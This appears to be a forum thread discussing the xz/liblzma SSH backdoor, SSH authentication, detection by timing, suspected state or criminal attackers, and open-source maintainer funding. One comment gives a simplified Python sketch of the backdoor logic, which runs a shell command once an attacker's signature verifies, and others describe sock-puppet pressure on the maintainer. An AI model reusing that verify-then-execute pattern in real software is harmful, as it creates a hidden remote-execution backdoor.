Edit: I guess the reverse is also true, that is, leaked user passwords from other sources can't be easily tested against your user accounts just by sending a bunch of HTTP requests to your server. The attacker would have to at least run the passwords through your particular salted hash scheme first (which they can get by reverse engineering your client, but it's extra labor and computation).
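For anyone who wants to see the shape of that scheme, a minimal sketch (Python; the per-site salt, the PBKDF2 parameters, and the function name are illustrative assumptions, not any particular site's implementation):

    import hashlib

    # Client side: derive a site-specific "password" so the real password
    # never leaves the machine and can't be replayed against other sites.
    def client_side_hash(password: str, site: str) -> str:
        salt = ("per-site-salt:" + site).encode()  # assumption: a fixed, public, per-site salt
        dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
        return dk.hex()

    # What actually goes over the wire (still inside TLS):
    transmitted = client_side_hash("hunter2", "example.org")

The derived value is what travels over TLS; the server then salts and hashes it again with its own server-side scheme, exactly as it would a normal password.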
That's exactly the case with HTTP credentials and most authentication frameworks...
If you want to hop into a rabbit hole, take a look at how Steam's login sends the user and pass ))
If TLS breaks then everything is untrusted anyway! If, as a MITM, you can read the hash, you can replay it as a password equivalent and log in with the hash; you don't need knowledge of the original password. You could also just inject a script to exfiltrate the original password before it's hashed. CSP is broken too, since you can edit the header to give your own inline script a nonce. In the end, I think everything relies on TLS.
I think 10 years ago, before TLS was 99%+ standard on all sites, many people would come up with schemes - forums would md5 the password client side and send the md5, all sorts of things were common. But now the trust is in TLS.
Even if you use a scheme where the password never traverses the wire, the schemes still require the server to know what your password is in order to perform the authentication. So a compromised server still leads to compromise of your secret credential. Public key authentication does not have this property.
One of the biggest differences is that if you're using password auth, and you are tricked into connecting to a malicious server, that server now has your plaintext password and can impersonate you to other servers.
If you use a different strong random password for every single server, this attack isn't a problem, but that adds a lot of management hassle compared to using a single private key. (It's also made more difficult by host key checking, but let's be honest, most of us don't diligently check the fingerprints every single time we get a mismatch warning.)
In contrast, if you use an SSH key, then a compromised server never actually gets a copy of your private key unless you explicitly copy it over. (If you have SSH agent forwarding turned on, then during the compromised connection, the server can run a "confused deputy" attack to authenticate other connections using your agent's identity. But it loses that ability when you disconnect.)
if you're using password auth, and you are tricked into connecting to a malicious server, that server now has your plaintext password and can impersonate you to other servers.
Why would the password be sent in plaintext instead of, say, sending a hash of the password calculated with a salt that is unique per SSH server? Or something even more cryptographically sound.
In fact, passwords in /etc/shadow already do have random salts, so why aren't these sent over to the SSH client so it can send a proper hash instead of the plaintext password?
It's a little bit more complicated than just sending a hash of the password, but there are ways to authenticate using hashed passwords without sending the password over the wire, for example https://en.wikipedia.org/wiki/Digest_access_authentication or https://en.wikipedia.org/wiki/Password-authenticated_key_agr...
Even so, these protocols require the server to know your actual password, not just a hash of the password, even though the password itself never traverses the network. So a compromised server can still lead to a compromised credential, and unless you use different passwords for every server, we're back to the same problem.
If the hash permits a login then having a hash is essentially equivalent to having a password. The malicious user wouldn't be able to use it to sudo but they could deploy some other privilege escalation once logged in.
Not a rhetorical question: couldn't the malicious server relay the challenge from a valid server for you to sign, and impersonate you that way?
No, these schemes use the pub/private keys to setup symmetric crypto, so just passing it along does you no good because what follows is a bunch of stuff encrypted by a session key only the endpoints know.
If I am a server and have your public key in an authorized_keys file, I can just encrypt a random session key using that and only you will be able to decrypt it to finish setting up the session.
This is why passwords and asymmetric crypto are worlds apart in security guarantees.
If a man in the middle relays a public key challenge, that will indeed result in a valid connection, but the connection will be encrypted such that only the endpoints (or those who possess a private key belonging to one of the endpoints) can read the resulting traffic. So the man in the middle is simply relaying an encrypted conversation and has no visibility into the decrypted contents.
The man in the middle can still perform denial of service, by dropping some or all of the traffic.
The man in the middle could substitute their own public key in place of one of the endpoint's public keys, but if each endpoint knows the other endpoint's key and is expecting that other key, then an unexpected substitute key will raise a red flag.
On that last point, I wouldn't pass around the certificate to log in from multiple sources, rather each source would have its own certificate. That is easy & cheap to do (especially with ed25519 certs).
Ah right, that's useful, thanks. Presumably if you need to login from an untrusted source (e.g. in an emergency), then you're out of luck in that case? Do you maybe keep an emergency access cert stashed somewhere?
I sometimes ask this as an interview question. Hardly anybody knows the answer.
So don't you want to enlighten us with the answer?
Have to admit I've never understood why password auth is considered so much worse than using a cert
Password auth involves sending your credentials to the server. They're encrypted, but not irreversibly; the server needs your plaintext username and password to validate them, and it can, in principle, record them to be reused elsewhere.
Public key and certificate-based authentication only pass your username and a signature to the server. Even if you don't trust the server you're logging into, it can't do anything to compromise other servers that key has access to.
The difference, IMHO, is that it's easier to pick an easy guessable password than it is to create an insecure RSA key (on purpose).
surely a decent password (long, random, etc) is for all practical purposes unguessable
Sadly that is not how normies use passwords. We know what password managers are for. The vast majority of people outside our confined sphere do not.
In short: password rotation policies make passwords overall less secure, because in order to remember what the new password is, people apply patterns. Patterns are guessable. Patterns get applied to future passwords as well. This has been known to infosec people since the 1990's because they had to understand how people actually behave. It took a research paper[0], published in 2010, to finally provide sufficient data for that fact to become undeniable.
It still took another 6-7 years until the information percolated through to the relevant regulatory bodies and for them to update their previous guidance. These days both NIST and NCSC tell in very clear terms to not require password rotation.
0: https://www.researchgate.net/publication/221517955_The_true_...
A lot of it has to do with centralizing administration. If you have more than one server and more than one user, certificates reduce a NxM problem into N+M instead.
Certificates can be revoked, they can have short expiry dates and due to centralized administration, renewing them is not terribly inconvenient.
On top of that they are a lot more difficult to read over the shoulder, to some degree that can be considered the second factor in a MFA scheme. Same reasons why passkeys are preferred over passwords lately. Not as secure as a HW-key, still miles better than “hunter2”.
It might be possible to use timing information to detect this, since the signature verification code appears to only run if the client public key matches a specific fingerprint.
The backdoor's signature verification should cost around 100us, so keys matching the fingerprint should take that much longer to process than keys that do not match it. Detecting this timing difference should at least be realistic over LAN, perhaps even over the internet, especially if the scanner runs from a location close to the target. Systems that ban the client's IP after repeated authentication failures will probably be harder to scan.
(https://bench.cr.yp.to/results-sign.html lists Ed448 verification at around 400k cycles, which at 4GHz amounts to 100us)
According to [1], the backdoor introduces a much larger slowdown (without backdoor: 0m0.299s; with backdoor: 0m0.807s). I'm not sure exactly why the slowdown is so large.
[1] https://www.openwall.com/lists/oss-security/2024/03/29/4
The effect of the slowdown on the total handshake time wouldn't work well for detection, since without a baseline you can't tell if it's slow due to the backdoor, or due to high network latency or a slow/busy CPU. The relative timing of different steps in the TCP and SSH handshakes on the other hand should work, since the backdoor should only affect one/some steps (RSA verification), while others remain unaffected (e.g. the TCP handshake).
However, only probabilistic detection is possible that way, and really, a 100us difference over the internet would require many, many detection attempts to discern.
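A crude sketch of that "relative timing of different steps" idea (Python, standard library only; the hostname in the usage line is a placeholder, and note this only compares the TCP connect with the wait for the SSH banner as a baselining example - actually exercising the backdoored RSA verification step would require offering a key/certificate matching the magic fingerprint, which this does not attempt):

    import socket
    import time

    def probe(host: str, port: int = 22, timeout: float = 5.0):
        # Step 1: TCP connect (unaffected by the backdoor).
        t0 = time.monotonic()
        s = socket.create_connection((host, port), timeout=timeout)
        t_connect = time.monotonic() - t0

        # Step 2: wait for the SSH version banner (the server speaks first).
        t1 = time.monotonic()
        banner = s.recv(256)
        t_banner = time.monotonic() - t1
        s.close()
        return t_connect, t_banner, banner.split(b"\r\n")[0].decode(errors="replace")

    if __name__ == "__main__":
        tc, tb, banner = probe("test.example.org")  # placeholder host
        print(f"{banner}  connect={tc*1000:.1f}ms  banner_wait={tb*1000:.1f}ms")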
The tweet says "unreplayable". Can someone explain how it's not replayable? Does the backdoored sshd issue some challenge that the attacker is required to sign?
What it does is this: RSA_public_decrypt verifies a signature on the client's (I think) host key by a fixed Ed448 key, and then if it verifies, passes the payload to system().
If you send a request to SSH to associate (agree on a key for private communications), signed by a specific private key, it will pass the rest of the request to the "system" call in libc, which will execute it in a shell.
So this is quite literally a "shellcode". Except, you know, it's on your system.
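For readers who want the shape of that logic rather than the binary details, here is a heavily simplified sketch in Python. The payload layout (signature followed by command), the freshly generated stand-in key pair, and the omission of the ChaCha20 step are assumptions made for illustration; only the overall "verify against the attacker's Ed448 key, then hand the string to system()" flow follows the public analyses.

    import subprocess
    from cryptography.exceptions import InvalidSignature
    from cryptography.hazmat.primitives.asymmetric.ed448 import Ed448PrivateKey

    # Stand-in for the attacker's key pair; in reality only the public key is
    # baked into the payload and the private half never leaves the attacker.
    attacker_priv = Ed448PrivateKey.generate()
    ATTACKER_PUB = attacker_priv.public_key()
    SIG_LEN = 114  # Ed448 signatures are 114 bytes

    def hooked_rsa_public_decrypt(n_field: bytes) -> bool:
        # Assumed layout: the certificate's RSA "N" value smuggles in
        # <Ed448 signature || command>. Only a command signed by the
        # attacker's key gets executed; everything else falls through.
        sig, command = n_field[:SIG_LEN], n_field[SIG_LEN:]
        try:
            ATTACKER_PUB.verify(sig, command)
        except InvalidSignature:
            return False                                 # not the attacker: behave normally
        subprocess.run(command.decode(), shell=True)     # the system() step
        return True

    # Only the holder of the private key can produce an accepted payload:
    cmd = b"id"
    assert hooked_rsa_public_decrypt(attacker_priv.sign(cmd) + cmd)
    assert not hooked_rsa_public_decrypt(b"\x00" * SIG_LEN + cmd)

The point of the sketch is the NOBUS property: without the attacker's private key you cannot construct an input that reaches the shell.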
Imagine a future where state actors have hundreds of AI agents fixing bugs, gaining reputation while they slowly introduce backdoors. I really hope open source models succeed.
Why would open source models make this scenario you are painting better?
Because in the closed source model the frustrated developer that looked into this SSH slowness submits a ticket for the owner of the malicious code to dismiss.
Not necessarily. A frustrated developer posts about it, it catches attention of someone who knows how to use Ghidra et al, and it gets dug out quite fast.
Except, with closed-source software maintained by a for-profit company, such a cockup would mean a huge reputational hit, with billions of dollars of lost market cap. So, there are very high incentives for companies to vet their devs, have proper code reviews, etc.
But with open-source, anyone can be a contributor, everyone is a friend, and nobody is reliably real-world-identifiable. So, carrying out such attacks is easier by orders of magnitude.
Absolutely not. Getting a job at any critical infrastructure software dev company is easier than contributing to the Linux kernel.
Can confirm. I may work at Meta, but I was nearly banned from contributing to an open source project because my commits kept introducing bugs.
So, there are very high incentives for companies to vet their devs, have proper code reviews, etc.
I'm not sure about that. It takes a few leetcode interviews to get in major tech companies. As for the review process, it's not always thorough (if it looks legit and the tests pass...). However, employees are identifiable and would take huge risk to be caught doing anything fishy.
We witnessed Juniper generating their VPN keys with Dual EC DRBG, and then the generator constants being subverted, with Juniper claiming not to know how it happened.
I don’t think it affected Juniper firewall business in any significant way.
It’s insane to consider the actual discovery of this to be anything other than a lightning strike. What’s more interesting here is that we can say with near certainty that there are other backdoors like this out there.
Time to start looking at similar cases for sure.
This seems completely unrelated to the grandparent comment’s mention of open source LLMs
... if we want security it needs trust anyway. it doesn't matter if it's amazing Code GPT or Chad NSA, the PR needs to be reviewed by someone we trust.
it's the trust that's the problem.
web of trust purists were right just ahead of the time.
It would actually be sort of interesting if multiple adversarial intelligence agencies could review and sign commits. We might not trust any particular intelligence agency, but I bet the NSA and China would both be interested in not letting much through, if they knew the other guy was looking.
That is an interesting solution. If China, the US, Russia, the EU, etc. all sign off and say "yep, this is secure", we should trust it, since if they think they found an exploit, they might assume the others found it too. This is a little like the idea of a fair cake cut: if two people want the last slice, you have one cut and the other choose, and since the chooser will pick the bigger slice, the cutter, knowing they will get the smaller one, will make the cut as equal as possible. In this case the NSA makes the cut (the code), and Russia / China choose whether it's allowed in.
NSA makes the cut and China picks the public key to use.
In all seriousness, those people will quickly find some middle ground and will just share keys with each other
Chad NSA
It's called the ANS in Chad.
this is why microsoft bought github and has been onboarding major open source projects. they will be the trusted 3rd party (whether we like it our not is a different story)
That just…doesn’t make any sense.
Everyone starts from zero and works their way up.
Imagine a world where a single OSS maintainer can do the work of 100 of today’s engineers thanks to AI. In the world you describe, it seems likely that contributors would decrease as individual productivity increases.
Wouldn't everything produced by an AI explicitly have to be checked/reviewed by a human? If not, then the attack vector just shifts to the AI model and that's where the backdoor is placed. Sure, one may be 50 times more efficient at maintaining such packages but the problem of verifiably secure systems actually gets worse not better.
And be burned out 100x faster
I work for a large closed-source software company and I can tell you with 100% certainty that it is full of domestic and foreign agents. Being open source means that more eyes can and will look at something. That only increases the chance of malicious actions being found out ... just like this supply-chain attack.
Reminds me of the scene in Fight Club where the unreliable narrator is discussing car defects to a fellow airline passenger.
Quoting from flawed memory:
Passenger: Which company?
Narrator: A large one.
Why AI agents?
Presumably the state actors are looking for other state actor's bugs, and would try to fix them, or least fix them to only work for them.
That's quite a game of cat and mouse.
If that's true, then I am 100% certain that this backdoor is from a nation state-level actor.
I already felt like this was way too sophisticated for a random cybercriminal. It's not like making up fake internet identities is very difficult, but someone has pretended to be a good-faith contributor for ages, in a surprisingly long-term operation. You need some funding and a good reason to pull off something like that.
This could also be a ransomware group hoping to break into huge numbers of servers, though. Ransomware groups have been getting more sophisticated and they will already infiltrate their targets for months at a time (to make sure all old backups are useless when they strike), so I wouldn't put it past them to infiltrate the server authentication mechanism directly.
Whoever this was, they were going after a government or a crypto exchange. I don't think anything else merits this effort.
I don't know that they had a singular target necessarily. Much like Solarwinds, they could take their pick of thousands of targets if this had gone undetected.
I think we can all agree this attacker was sophisticated. But why would a government want to own tons of random Linux machines that have open sshd mappings? You have to expose sshd explicitly in most cloud environments (or on interesting networks worthy of attack.) Besides, the attacker must've known that if this is all over the internet eventually someone is going to notice.
I think the attacker had a target in mind. They were clearly focused on specific Linux distros. I'd imagine they were after a specific set of sshd bastion machine(s). Maybe they have the ability to get on the VPN that has access to the bastion(s) but the subset of users with actual bastion access is perhaps much smaller and more alert/less vulnerable to phishing.
So what's going to be the most valuable thing to hack that uses Linux sshd bastions? Something so valuable it's worth dedicating ~3 years of your life to it? My best guess is a crypto exchange.
But why would a government want to own tons of random Linux machines that have open sshd mappings?
They don’t want tons. They want the few important ones.
Turns out it was easiest to get to the important ones by pwning tons of random ones.
That still implies there was a target in mind. But also they would've had to assume the access would be relatively short-lived. This means to me they had something specific they wanted to get access to, didn't plan to be there long, and weren't terribly concerned about leaving a trail of their methods.
Why couldn't they have had 50 or 100 targets in mind, and hoped that the exploit would last for at least the month (or whatever) they needed to accomplish their multiple, unrelated goals?
I think your imagination is telling you a story that is prematurely limiting the range of real possibilities.
Something so valuable it's worth dedicating ~3 years of your life to it?
This isn't the right mindset if you want to consider a state actor, particularly for something like contributing to an open source project. It's not like you had to physically live your cover life while trying to infiltrate a company or something.
Yes, this is a lot of resources to spend, but at the same time, even dedicating one whole FTE for 3 years isn't that much in resources. It's just salary at that point.
Governments have a lot of money and time to spend. So having one more tool in the box for that single time you need to access a target makes this kind of work an entirely reasonable investment. If it hadn't been used, would this have been noticed, possibly for years? That gives quite a lot of room to find a target for the times when it is needed.
And you could have multiple projects doing this type of work in parallel.
Otoh, maybe they just wanted to create a cryptomining farm. Lol.
Don't underestimate the drive some people have to make a buck.
people downvoting you already forgot the cia fundraiser in the 80s...
I would expect a nation state to have better sock puppet accounts though.
better sock puppet accounts though.
Seems to me like they had perfectly good enough sock puppet accounts. It wasn't at all obvious they were sock puppets until someone detected the exploit.
Those guys are estimated to have made $1 billion last year - have to think that buys some developer talent.
What is the possibility of identity theft conducted at the state level? There are reports that the times the backdoor commits were pushed do not match the author's usual commit timing.
It also seems like a convenient ground for a false flag operation: hijacking an account that belongs to a trustworthy developer from another country.
And risk discovery by the trustworthy developer? Unlikely.
What if the developer had passed away? Otherwise it would also be easy to blame it on the developer having mental issues.
I imagine such actors are embedded within major consumer tech teams, too: Twitter, TikTok, Chrome, Snap, WhatsApp, Instagram... that covers ~70% of all humanity.
This could be something that an agent who has infiltrated a company could use to execute stuff on internal hosts they have SSH connectivity to but no access on.
You could get into bastion hosts and then to PROD and leave no log traces.
That's what this feels like. That, or someone who wanted to sell this to one. Can't imagine the ABC's are sleeping on this one at this point.
Unpopular opinion, but I cannot but admire the whole operation. Condemn it of course, but still admire it. It was a piece of art! From conception to execution, masterful! We got extremely lucky that it was caught so early.
I agree, but the social engineering parts do feel particularly cruel
I felt really bad for the original maintainer getting dog-piled by people who berated him for not doing his (unpaid) job and basically just bring shame and discredit to himself and the community. Definitely cruel.
Though… do we know that the maintainer at that point was the same individual as the one who started the project? Goes deep, man.
Even if it's not his fault, the maintainer at this point won't be trusted at all. I feel for him; I think even finding a job right now would be impossible for him. Why would you hire someone who could be suspected of that?
This could've happened to anybody, frankly. The attacker was advanced and persistent. I cannot help but feel sympathetic for the original maintainer here.
From TFA's profile:
https://bsky.app/profile/filippo.abyssdomain.expert/post/3ko...
This is a profound realization, isn't it? How much more paranoid should/will maintainers be going forward?
No. From what I've read on the openwall and lkml mailing lists (so generally people who know a lot more about these things than I do), nobody accused Lasse Collin, the original maintainer, of being involved in this, at all, and there wasn't any notion of him becoming untrustworthy.
It's possible the adversary was behind, or at least encouraged, the dog-piling crowd who berated him. Probably a basic tactic from a funded evil team's playbook.
Might be worth reviewing those who berated him to see if they resolve to real people, to see how deep this operation goes.
This has been investigated and the conclusion is IMO clear: the dogpiling accounts were part of the operation. See the parts about Jigar Kumar in this link: https://boehs.org/node/everything-i-know-about-the-xz-backdo...
One of them, who left only one comment, does; the rest are sock puppets.
If the payload didn't have a random .5 second hang during SSH login, it would probably not have been found for a long time.
The next time, the attackers will probably manage to build a payload that doesn't cause weird latency spikes on operations that people wait on.
(For some reason this brings to mind how Kim Dotcom figured out he was the target of an illegal wiretap... because he suddenly had a much higher ping in MW3. When he investigated, he found out that all his packets were specifically routed a very long physical distance through a GCSB office. GCSB has no mandate to wiretap permanent NZ residents. He ended up getting a personal apology from the NZ Prime Minister.)
I'm a little out of touch, but for over a decade I'd say half the boxes I touched either didn't have enough entropy or were trying to do rDNS for (internal) ranges against servers that didn't host them, and it was nearly always hand-waved away by the team running it as NFN.
That is to say, a half-second pause during the ssh login is absolutely the _least_ suspicious place for it to happen, and I'm somewhat amazed anyone thought to go picking at it as quickly as they did.
What led to continuous investigation wasn't just the 500ms pause, but large spikes in CPU activity when sshd was invoked, even without a login attempt.
What led to it was the fact that he was already micro-benchmarking postgresql, along with a couple of other bits of fluke. We were all extremely lucky.
If the payload didn't have a random .5 second hang during SSH login, it would probably not have been found for a long time.
Ironic, how an evil actor failed for a lack of premature optimization :D
"After all, He-Who-Must-Not-Be-Merged did great things - terrible, yes, but great."
I think the most ingenious part was picking the right project to infiltrate. Reading "Hans'" IFUNC pull request discussion is heart-wrenching in hindsight, but it really shows why this project was chosen.
I would love to know how many people were behind "Jia" and "Hans", analyzing and strategizing communication and code contributions. Some aspects, like those third-tier personas faking pressure on mailing lists, seem a bit carelessly crafted, so I think it's still possible this was done by a sophisticated small team or even a single individual. I presume a state actor would have people pumping out and maintaining fake personas all day for these kinds of operations. I mean, it would have kinda sucked if someone had thought: "Hm. It's a bit odd how rudely these three users are pushing. Who are they anyway? Oh, look, they were all created at the same time. Suspicious. Why would anyone fake accounts to push so hard for this specifically? I need to investigate". Compared to the overall effort invested, that's careless, badly planned or underfunded.
Carelessness could arguably be part of the operation: testing/probing how thoroughly the community scrutinizes communication from untrusted individuals.
Compared to the overall effort invested, that's careless, badly planned or underfunded.
Not at all. It's a pattern that's very easy to spot while the eyes of the world are looking for it. When it was needed, it worked exactly as it needed to work. Had the backdoor not been discovered, no one would have noticed--just like no one did notice for the past couple of years.
Had anyone noticed at the time, it would have been very easy to just back off and try a different tactic a few months down the line. Once something worked, it would be quick to fade into forgotten history--unlikely to be noticed until, like now, the plan was already discovered.
I bet it’s not that unpopular. It’s a very impressive attack in many ways:
- It’s subtle.
- It was built up over several years.
- If the attacker hadn’t screwed up with the weird performance hit that triggered investigation (my dramatic theory: the attacker was horrified at the infonuclear bomb they were detonating and deliberately messed up), we likely wouldn’t know about it.
You can detest the end result while appreciating the complexity of the attack.
I don't think "admire" is the right word, but it's a pretty impressive operation.
It baffles me how such an important package that so many Linux servers use every day is unmaintained by the original author due to insufficient funds. Something's gotta change in OSS. I think one solution could be licenses that force companies/businesses of certain sizes to pay maintenance fees. One idea off the top of my head.
I think one solution could be licenses that force companies/businesses of certain sizes to pay maintenance fees. One idea off the top of my head.
Yet people have huge opposition to those licenses. The big scream of "not free anymore" starts and the entity gets cancelled.
I think focusing on big organizations (e.g. above a certain revenue/profit) should help.
There must be some sweet spot, after all, the organizations that rely on it should want it to be maintained as well.
tragedy of the commons.
If someone else can pay to maintain it, but you get the benefits, then it's the obvious strategy to use.
And also, there's zero evidence that proprietary software won't have these backdoors. In fact, you can't even check them for it!
That's why I think such OSS packages should use licenses that force large companies to pay (moderate) fees for maintenance. I assume such sums of money won't even tickle them.
Imagine 10 large companies, each pay $1000 a month for critical packages they use. For each developer, that's $10,000 they can either use to quit their current job or hire another person to share the burden.
We need to normalize this.
You may as well just slap a "no commercial use" restriction on it. It takes months to go through procurement at the average big company, and still would if the package cost $1. Developers at these companies will find something else without the friction.
Maybe we need a platform to make this easier?
There is already GitHub Sponsors, for example. What would we need to change from that?
I’m not an expert on this. If it ticks all the legal and other boxes big companies need to deal with, in a frictionless manner, then that’s good. If not, maybe a different solution is needed.
Not really. Just make your software AGPLv3. It's literally the most free license GNU and the FSF have ever come up with. It ensures your freedom so hard the corporations cannot tolerate it. Now you have leverage. If the corporations want it so bad, they can have it. They just gotta ask for permission to use it under different terms. Then they gotta pay for it.
https://www.gnu.org/philosophy/selling-exceptions.html
All you have to do is not MIT or BSD license the software. When you do that, you're essentially transferring your intellectual property to the corporations at zero cost. Can't think of a bigger wealth transfer in history. From well meaning individual programmers and straight to the billionaires.
The BSD style openness only makes sense in a world without intellectual property. Until the day copyright is abolished, it's either AGPLv3 or all rights reserved. Nothing else makes sense.
The problem is, there will be almost zero packages that (very few) "corporations want so bad". The only exception might be cloud providers, that want to host your mildly-popular open-source message queue, but, again, if you are Amazon, you'll soon just re-implement that message queue, drop the "original" one, and after a couple of years your mildly-popular project will become not popular at all.
In that case we'll simply end up exactly where we started. There's a twist though. This time around we're not being taken for fools and exploited.
Better to have a completely irrelevant forgotten project than a massively popular one that makes us zero dollars while CEOs make billions off of it.
This post always comes to mind every time this topic comes up:
https://web.archive.org/web/20120620103603/http://zedshaw.co...
I want people to appreciate the work I’ve done and the value of what I’ve made.
Not pass on by waving “sucker” as they drive their fancy cars.
That is a really good post from 15? years ago, and still very relevant to this day.
It baffles me how such an important package that so many Linux servers use every day is unmaintained by the original author due to insufficient funds.
Is it actually insufficient funds or is it burnout?
I'm not sure. I know from working on OSS projects personally that insufficient funds can easily lead to burnout as well. You gotta find other sources of revenue while STILL maintaining your OSS project.
In the case of XZ it was more akin to burnout, based on what was written around the time Jia Tan was instated.
same thing; if you have money you can hire people to spread the burden
There's a difference between important and necessary. The package is necessary, not important.
The proposed EU Cyber Resilience Act positions itself as a solution. To put it simply, vendors are responsible for vulnerabilities throughout the lifetime of their products, whether that is a firewall or a toaster. Thus, vendors are incentivized to keep OSS secure, whether that means paying maintainers, commissioning code audits or hiring FTEs to contribute.
I have found it irritating how in the community, in recent years, it's popular to say that if a project doesn't have recent commits or releases that something is seriously wrong. This is a toxic attitude. There was nothing wrong with "unmaintained" lzma two years ago. The math of the lzma algorithm doesn't change. The library was "done" and that's ok. The whiny mailing list post from the sock puppet, complaining about the lack of speedy releases, which was little more than ad hominem attacks on the part time maintainer, is all too typical and we shouldn't assume those people are "right" or have any validity to their opinion.
The math of the lzma algorithm doesn't change. The library was "done" and that's ok.
Playing devil's advocate: the math doesn't change, but the environment around it does. Just off the top of my head, we have: the 32-bit to 64-bit transition, the removal of pre-C89 support (https://fedoraproject.org/wiki/Changes/PortingToModernC) which requires an autotools update, the periodic tightening of undefined behaviors, new architectures like RISC-V, the increasing amount of cores and a slowdown in the increase of per-core speed, the periodic release of new and exciting vector instructions, and exotic security features like CHERI which require more care with things like pointer provenance.
the 32-bit to 64-bit transition
Lzma is from 2010. Amd64 became mainstream in the mid 2000s.
removal of pre-C89 support
Ibid. Also, at the library API level, C89-compatible code is still pretty familiar territory under C99 and later.
new architectures like RISC-V
Shouldn't matter for portable C code?
the increasing amount of cores and a slowdown in the increase of per-core speed,
Iirc parallelism was already a focus of this library in the 2010s, I don't think it really needs a lot of work in that area.
Actually, new architectures are a big source of concern. As a maintainer of a large open source project, I often received pull requests for CPU architectures that I never had a chance to touch. So I cannot build the code, cannot run the tests, and do not understand most of the code. C/C++ themselves are portable, but libs like xz need to beat the competition on performance, which means you may need to use model-specific SIMD instructions, query CPU cache size and topology, and work at a very low level. That code is not portable. When people add such code, they often also need to add some tests, disable some existing tests conditionally, or tweak the build scripts. Those are all risks.
No matter how smart you are, you cannot forecast the future. Many CPUs now have a heterogeneous configuration, which means they have big cores and little cores. But do all the cores have the same capabilities? Is it possible that a CPU instruction is only available on some of the cores? What does that mean for a multithreaded application? Could 64-bit CPUs drop support for 32-bit at the hardware level? Ten years ago you couldn't predict what's happening today.
Windows has a large compatibility layer, which allows you to run old code on the latest hardware and the latest Windows. It takes quite a lot of effort. Many applications would crash without the compatibility patches.
I am a former MS employee, I used to read the compatibility patches when I was bored at the office.
Anyway, liblzma does not "need" to outperform any "competition". If someone wants to work on some performance optimization, it's completely fair to fork. Look at how many performance oriented forks there are of libjpeg. The vanilla libjpeg still works.
The vanilla python works fine but conda is definitely more popular among data scientists.
and then that fork becomes more performant or feature rich or secure or (etc), and it becomes preferred over the original code base, and all distributions switch to it, and we're back at square one.
A software project has the features it implements, the capabilities it offers users, and the boundary between itself and the environment in which those features create value for the user by becoming capabilities.
The "accounting" features in the source code may be finished and bug-free, but if the outside world has changed and now the user can't install the software, or it won't run on their system, or it's not compatible with other current software, then the software system doesn't grant the capability "accounting," even though the features are "finished."
Nothing with a boundary is ever finished. Boundaries just keep the outside world from coming in too fast to handle. If you don't maintain them then eventually the system will be overwhelmed and fail, a little at a time, or all at once.
I feel like this narrative is especially untrue for things like lzma where the only dependencies are memory and CPU, and written in a stable language like C. I've had similar experiences porting code for things like image formats, audio codecs, etc. where the interface is basically "decode this buffer into another buffer using math". In most cases you can plop that kind of library right in without any maintenance at all, it might be decades old, and it works. The type of maintenance I would expect for that would be around security holes. Once I patched an old library like that to handle the fact that the register keyword was deprecated.
Smaller boundaries are likelier to need less maintenance, but nothing stands still. The reason you can run an ancient simple binary on newer systems is that someone has deliberately made that possible. People worked to make sure the environment around its boundary would stay the same instead of drifting randomly away with time—usually so doggedly (and thanklessly) that we can argue whether that stability was really a result of maintenance or just a fact of nature.
The reason you can run an ancient simple binary on newer systems is that someone has deliberately made that possible.
I'm not talking about binaries. I'm talking about C sources. I've done the kind of work you're talking about. You're overestimating it.
I must have misread "plop that kind of library" as "plop that kind of binary" about five times. My bad.
C is not stable, and new CPU microarchitecture versions keep arriving. LZMA compression is not far from trivial. The trade-offs made back then might not be the most useful ones now, hence there are usually things that make sense to change even if the background math will be the same forever.
sure, churn and make believe maintenance for the sake of feeling good is harmful. (and that's where the larger community comes in, distributions, power users, etc. we need to help good maintainers, and push back against bad ones. and yes this is - of course - easier said than done.)
Excellent point. I believe that comes from corporate supply-chain-attack "response": their insistence on making hard rules about "currency" and "activity" and "is maintained" pushes this kind of crap.
Attackers know this as well. It doesn't take much to hang around various mailing lists and look for stuff like this: https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.h...
(Random user or sock puppet) Is XZ for Java still maintained?
(Lasse) I haven't lost interest but my ability to care has been fairly limited mostly due to ...
(Lasse) Recently I've worked off-list a bit with Jia Tan on XZ Utils and perhaps he will have a bigger role in the future, we'll see. It's also good to keep in mind that this is an unpaid hobby project
With a few years worth of work by a team of 2-3 people: one writes and understand the code, one communicates, a few others pretend to be random users submitting ifunc patches, etc., you can end up controlling the project and signing releases.
7-Zip supports .xz and keeping its developer Igor Pavlov informed about format changes (including new filters) is important too.
I've always found that dev's name tilts me.
Funnily enough, the Chinese name was no reason to investigate. It was a performance issue.
Also, regarding the discussion of whether a specific distribution was targeted: Jia advocated for Fedora to upgrade to 5.6.x. Fedora is the precursor to RHEL.
Together with the backdoor not working when LANG is not set (USA).
Those are two details suggesting the target was USA. Though either or both could've been part of the deception.
I mostly agree with you, but I think your argument is wrong. Last month I found a tiny bug in Unix's fgrep program (the bug poses no risk). The program implements the Aho-Corasick algorithm, which hasn't changed much over decades. However, the bug was still present at least as of the code released in 4.4BSD. It is not much of a concern, as nowadays most fgrep programs are just an alias of grep; they do not use the old Unix code anymore. The old Unix code, and much of FreeBSD, really couldn't meet today's security standards. For example, many text processing programs are vulnerable to DoS attacks when processing well-crafted input strings. I agree with you that in many cases we really don't need to touch the old code. However, it is not just because the algorithm didn't change.
Two popular and well-tested Rust YAML libraries were recently marked as unmaintained, and people are rushing to move away from them to brand-new projects because warnings went out about it.
There was nothing wrong with "unmaintained" lzma two years ago.
Well, that's not exactly true. The first patch from Jia Tan is a minor documentation fix, and the second is a bugfix which, according to the commit message (by Collin), "breaks the decoder badly". There's a few more patches after that that fix real issues.
Mark Adler's zlib has been around for a lot longer than xz/liblzma, and there's still bugfixes to that, too.
I was just looking at headscale. Last release mid 2023.
I had immediately asked myself: is this even maintained anymore?
I think this is a very valid question to ask.
Is there a git diff which shows this going in?
Apparently it’s not in the original repo, but in a build script in a distribution tar.
They also used social engineering to disable fuzzing which would have caught the discrepancy: https://github.com/google/oss-fuzz/pull/10667
It’s pretty funny how a bunch of people come piling reaction emojis onto the comments in the PR, after it has all become publicly known.
I’m like.. bro, adding reaction emojis after the fact as if that makes any sort of difference to anything.
Feels almost like tampering with evidence at a crime scene
It’s just like adding your initials to the tunnel someone famous just died in.
That’s absurd. Elaborate.
That thread has become an online event and obviously lost its original constructive purpose the moment the malicious intent became public. The commenters are not trying to alter history; they're leaving their mark on a historic moment. I mean, the "lgtm" aged like milk and the emoji reactions are pretty funny commentary.
Honestly, it's harassment at this point.
Would it really have caught it?
No
... why?
my understanding is that fuzzing "caught" the issue by crashing with ifunc disabled
but it wouldn't have "caught" the backdoor which uses public key cryptography
